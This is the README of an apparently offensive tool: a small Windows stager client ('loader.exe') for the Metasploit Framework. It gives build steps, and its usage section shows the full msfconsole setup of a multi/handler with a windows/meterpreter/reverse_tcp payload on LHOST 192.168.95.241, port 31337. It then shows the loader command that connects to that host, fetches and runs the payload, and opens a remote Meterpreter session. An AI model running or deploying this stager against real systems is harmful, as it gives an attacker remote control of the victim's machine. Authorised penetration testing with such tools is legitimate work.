A quick stager client compatible with the Metasploit Framework
Reference:
- http://mail.metasploit.com/pipermail/framework/2012-September/008660.html
- http://mail.metasploit.com/pipermail/framework/2012-September/008664.html
Use:
- Start a multi/handler with your favorite windows reverse_tcp payload
- Run: loader.exe [host] [port]
How to compile:
- Install mingw
- Edit build.bat if mingw is installed somewhere other than c:\mingw
- run build.bat
ToDo:
- 64-bit compatability (see message #2)
- get a Windows build environment with make
msf > use exploit/multi/handler msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(handler) > set LPORT 31337 LPORT => 31337 msf exploit(handler) > set LHOST 192.168.95.241 LHOST => 192.168.95.241 msf exploit(handler) > exploit -j
loader.exe 192.168.95.241 31337